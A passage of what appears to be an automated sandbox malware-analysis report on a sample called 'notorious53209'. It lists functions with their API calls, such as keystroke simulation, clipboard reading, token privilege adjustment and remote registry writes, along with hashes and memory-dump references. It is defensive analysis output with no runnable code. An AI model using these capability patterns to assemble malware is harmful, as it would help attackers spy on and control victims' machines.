                                                  • Opcode ID: 46c31670aeef47717370e47323bd9fa9e7b82500c6f13422fbeb5d3a12f6c02f
                                                  • Instruction ID: c2085e53de23332a74bb611ff7c4bec1c1d4c14e9a0cdd2606ca3bec4b80fe5e
                                                  • Opcode Fuzzy Hash: 46c31670aeef47717370e47323bd9fa9e7b82500c6f13422fbeb5d3a12f6c02f
                                                  • Instruction Fuzzy Hash: 67714D342043418FC714EF29C491A6AB7E0FF99714F18496DF996DB2A2DB30ED49CB52
                                                  Function 008A0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction ID: 1dc9fdbf08c2d9f326ae3044a1ab10a9bfaaa91819811b2a15476d27f519fb32
                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                  • Instruction Fuzzy Hash: 8231C270A00109DFEB18DF58D480969F7A6FF5A304B648AA5E409DBA51DB31EDE1EF80
                                                  Function 001022A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 001022B1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.358795810.0000000000100000.00000040.00001000.00020000.00000000.sdmp, Offset: 00100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_100000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction ID: ae1263a8c5df1df69784c9d4d00af95216a69fac0d25b7e0e4fcf69dfb227714
                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                  • Instruction Fuzzy Hash: 3FE0BF7494010E9FDB00EFE4D5496AE7BB4EF04301F100161FD0592280D77099508A62

                                                  Non-executed Functions

                                                  Function 0090CDAC Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 637windowkeyboardnativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 0090CE50
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0090CE91
                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0090CED6
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0090CF00
                                                  • SendMessageW.USER32 ref: 0090CF29
                                                  • _wcsncpy.LIBCMT ref: 0090CFA1
                                                  • GetKeyState.USER32(00000011), ref: 0090CFC2
                                                  • GetKeyState.USER32(00000009), ref: 0090CFCF
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0090CFE5
                                                  • GetKeyState.USER32(00000010), ref: 0090CFEF
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0090D018
                                                  • SendMessageW.USER32 ref: 0090D03F
                                                  • SendMessageW.USER32(?,00001030,?,0090B602), ref: 0090D145
                                                  • SetCapture.USER32(?), ref: 0090D177
                                                  • ClientToScreen.USER32(?,?), ref: 0090D1DC
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0090D203
                                                  • ReleaseCapture.USER32 ref: 0090D20E
                                                  • GetCursorPos.USER32(?), ref: 0090D248
                                                  • ScreenToClient.USER32(?,?), ref: 0090D255
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0090D2B1
                                                  • SendMessageW.USER32 ref: 0090D2DF
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0090D31C
                                                  • SendMessageW.USER32 ref: 0090D34B
                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0090D36C
                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0090D37B
                                                  • GetCursorPos.USER32(?), ref: 0090D39B
                                                  • ScreenToClient.USER32(?,?), ref: 0090D3A8
                                                  • GetParent.USER32(?), ref: 0090D3C8
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0090D431
                                                  • SendMessageW.USER32 ref: 0090D462
                                                  • ClientToScreen.USER32(?,?), ref: 0090D4C0
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0090D4F0
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0090D51A
                                                  • SendMessageW.USER32 ref: 0090D53D
                                                  • ClientToScreen.USER32(?,?), ref: 0090D58F
                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0090D5C3
                                                    • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0090D65F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                  • String ID: @GUI_DRAGID$F
                                                  • API String ID: 302779176-4164748364
                                                  • Opcode ID: ee5aae2eacdde7a6695aa04f530c3d1d242dcc823180b59b30fe33f143a29711
                                                  • Instruction ID: ef9134f9abb4c47caf73846163af60fb6fa9c83f9293f07a489f6efe115eb17b
                                                  • Opcode Fuzzy Hash: ee5aae2eacdde7a6695aa04f530c3d1d242dcc823180b59b30fe33f143a29711
                                                  • Instruction Fuzzy Hash: 5942ABB4208341AFD725CF68C858EAABBE9FF49314F14061DF699972E0C731AD41DB92
                                                  Function 0090804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0090873F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: %d/%02d/%02d
                                                  • API String ID: 3850602802-328681919
                                                  • Opcode ID: 0d72e5b5287c8bcc00b2e578be3e066800f2f256a0e200d5445a6ad36ddba4ed
                                                  • Instruction ID: eafe5ce91a01892d6a5014e01d999a71ab0cd322ca33a3fdee66eb834fb81bd6
                                                  • Opcode Fuzzy Hash: 0d72e5b5287c8bcc00b2e578be3e066800f2f256a0e200d5445a6ad36ddba4ed
                                                  • Instruction Fuzzy Hash: 6512BD71604208AFEB258F28CC49FAF7BB8EF49710F204569F995EA2E1DF748941DB10
                                                  Function 0089710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove$_memset
                                                  • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                  • API String ID: 1357608183-1798697756
                                                  • Opcode ID: 8fecab593d11c5558cd0cd1d8c366683948489a3c059231fc60c9a7326ffec8b
                                                  • Instruction ID: 66eb76c487330a0750d50357f48e998a98601f9afd1ad1088e9db0f26489ab5b
                                                  • Opcode Fuzzy Hash: 8fecab593d11c5558cd0cd1d8c366683948489a3c059231fc60c9a7326ffec8b
                                                  • Instruction Fuzzy Hash: 6B938171A04219DBDF24DF58D881BADB7B1FF58714F24826AE955EB380E7709E81CB40
                                                  Function 00884A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 00884A3D
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008BDA8E
                                                  • IsIconic.USER32(?), ref: 008BDA97
                                                  • ShowWindow.USER32(?,00000009), ref: 008BDAA4
                                                  • SetForegroundWindow.USER32(?), ref: 008BDAAE
                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 008BDAC4
                                                  • GetCurrentThreadId.KERNEL32 ref: 008BDACB
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 008BDAD7
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 008BDAE8
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 008BDAF0
                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 008BDAF8
                                                  • SetForegroundWindow.USER32(?), ref: 008BDAFB
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB10
                                                  • keybd_event.USER32(00000012,00000000), ref: 008BDB1B
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB25
                                                  • keybd_event.USER32(00000012,00000000), ref: 008BDB2A
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB33
                                                  • keybd_event.USER32(00000012,00000000), ref: 008BDB38
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 008BDB42
                                                  • keybd_event.USER32(00000012,00000000), ref: 008BDB47
                                                  • SetForegroundWindow.USER32(?), ref: 008BDB4A
                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 008BDB71
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 4125248594-2988720461
                                                  • Opcode ID: 68a72e28d85c5a7e715f1a2d1a5352d741feb57df9b30369da1cb0d68ef73f98
                                                  • Instruction ID: 88758fc1e951f05b0a54820d3ea046e072891ba15a1df00319ae1a61bd539efd
                                                  • Opcode Fuzzy Hash: 68a72e28d85c5a7e715f1a2d1a5352d741feb57df9b30369da1cb0d68ef73f98
                                                  • Instruction Fuzzy Hash: FF317371A5431CBFEB316FA19C49FBE7E6CEB44B60F114025FA04EA1D1D6B15A00BBA0
                                                  Function 008F425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenClipboard.USER32(0090F910), ref: 008F4284
                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 008F4292
                                                  • GetClipboardData.USER32(0000000D), ref: 008F429A
                                                  • CloseClipboard.USER32 ref: 008F42A6
                                                  • GlobalFix.KERNEL32(00000000), ref: 008F42C2
                                                  • CloseClipboard.USER32 ref: 008F42CC
                                                  • GlobalUnWire.KERNEL32(00000000), ref: 008F42E1
                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 008F42EE
                                                  • GetClipboardData.USER32(00000001), ref: 008F42F6
                                                  • GlobalFix.KERNEL32(00000000), ref: 008F4303
                                                  • GlobalUnWire.KERNEL32(00000000), ref: 008F4337
                                                  • CloseClipboard.USER32 ref: 008F4447
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
                                                  • String ID:
                                                  • API String ID: 941120096-0
                                                  • Opcode ID: 987dda924b33b15a52d34ee85cce972767a458e4bd9b77222a096e1b3f4b2c6a
                                                  • Instruction ID: bf2fcffdc5052a9779fd581b26f62b7a30598ec8c738f331654d52c77ba4e19b
                                                  • Opcode Fuzzy Hash: 987dda924b33b15a52d34ee85cce972767a458e4bd9b77222a096e1b3f4b2c6a
                                                  • Instruction Fuzzy Hash: FC518E35208209AFD310FB68DC95F7F77A8FF84B10F10452AF696D22A1DB71DA059B62
                                                  Function 008D8858 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 224COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D8D0D
                                                    • Part of subcall function 008D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8D3A
                                                    • Part of subcall function 008D8CC3: GetLastError.KERNEL32 ref: 008D8D47
                                                  • _memset.LIBCMT ref: 008D889B
                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008D88ED
                                                  • CloseHandle.KERNEL32(?), ref: 008D88FE
                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008D8915
                                                  • GetProcessWindowStation.USER32 ref: 008D892E
                                                  • SetProcessWindowStation.USER32(00000000), ref: 008D8938
                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008D8952
                                                    • Part of subcall function 008D8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008D8851), ref: 008D8728
                                                    • Part of subcall function 008D8713: CloseHandle.KERNEL32(?), ref: 008D873A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                  • String ID: $default$winsta0
                                                  • API String ID: 2063423040-1027155976
                                                  • Opcode ID: 1dd7f984af4ed12ef0024a98f2515ccf2053df7891f8775599d524eba3bb53a3
                                                  • Instruction ID: 3d4f9b3e4906a60fd7efaa56eee893e41fefb9867025554157500de6ccc69ab5
                                                  • Opcode Fuzzy Hash: 1dd7f984af4ed12ef0024a98f2515ccf2053df7891f8775599d524eba3bb53a3
                                                  • Instruction Fuzzy Hash: D5814A71900219EFDF21DFA4DC45AEEBBB8FF04314F08426AF910E6261DB718E149B62
                                                  Function 008EC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 008EC9F8
                                                  • FindClose.KERNEL32(00000000), ref: 008ECA4C
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008ECA71
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008ECA88
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 008ECAAF
                                                  • __swprintf.LIBCMT ref: 008ECAFB
                                                  • __swprintf.LIBCMT ref: 008ECB3E
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                  • __swprintf.LIBCMT ref: 008ECB92
                                                    • Part of subcall function 008A38D8: __woutput_l.LIBCMT ref: 008A3931
                                                  • __swprintf.LIBCMT ref: 008ECBE0
                                                    • Part of subcall function 008A38D8: __flsbuf.LIBCMT ref: 008A3953
                                                    • Part of subcall function 008A38D8: __flsbuf.LIBCMT ref: 008A396B
                                                  • __swprintf.LIBCMT ref: 008ECC2F
                                                  • __swprintf.LIBCMT ref: 008ECC7E
                                                  • __swprintf.LIBCMT ref: 008ECCCD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                  • API String ID: 3953360268-2428617273
                                                  • Opcode ID: fe4a89206ac7451b6b8a6dc55e490d5a0652c71511875b64df7159dc33053280
                                                  • Instruction ID: 789289d480e1ba0fc53c9a73f44b0f035655bfa318f50eb65e0170084dfa0b95
                                                  • Opcode Fuzzy Hash: fe4a89206ac7451b6b8a6dc55e490d5a0652c71511875b64df7159dc33053280
                                                  • Instruction Fuzzy Hash: 6FA13AB2508314ABC714FBA8C885DAFB7ECFF94704F440929F586C2191EA34DA09CB63
                                                  Function 008EF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 008EF221
                                                  • _wcscmp.LIBCMT ref: 008EF236
                                                  • _wcscmp.LIBCMT ref: 008EF24D
                                                  • GetFileAttributesW.KERNEL32(?), ref: 008EF25F
                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 008EF279
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 008EF291
                                                  • FindClose.KERNEL32(00000000), ref: 008EF29C
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 008EF2B8
                                                  • _wcscmp.LIBCMT ref: 008EF2DF
                                                  • _wcscmp.LIBCMT ref: 008EF2F6
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 008EF308
                                                  • SetCurrentDirectoryW.KERNEL32(0093A5A0), ref: 008EF326
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 008EF330
                                                  • FindClose.KERNEL32(00000000), ref: 008EF33D
                                                  • FindClose.KERNEL32(00000000), ref: 008EF34F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                  • String ID: *.*
                                                  • API String ID: 1803514871-438819550
                                                  • Opcode ID: 31492532643377efdb4de2c9e92f8a554b39a2c413c829791486e69e95ab3375
                                                  • Instruction ID: 37daaf446db4afe04e9dcbe9cc1cc04075d321c273b6ba6a10aacc15858e4473
                                                  • Opcode Fuzzy Hash: 31492532643377efdb4de2c9e92f8a554b39a2c413c829791486e69e95ab3375
                                                  • Instruction Fuzzy Hash: 5931AE766002596EDB20DBA5DC58ADE73ACEF4A360F100176FA14D31A1EB30DB85DB50
                                                  Function 00900AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900BDE
                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0090F910,00000000,?,00000000,?,?), ref: 00900C4C
                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00900C94
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00900D1D
                                                  • RegCloseKey.ADVAPI32(?), ref: 0090103D
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0090104A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Close$ConnectCreateRegistryValue
                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                  • API String ID: 536824911-966354055
                                                  • Opcode ID: 9232d8abb2c51f4a0ecc46b63ca614a137fbf43d56a360a458fb32ac073e6693
                                                  • Instruction ID: 9ef861fed063fc2d2941af8b2f10d08323f04c67732c5a71f738cccc23cd2a92
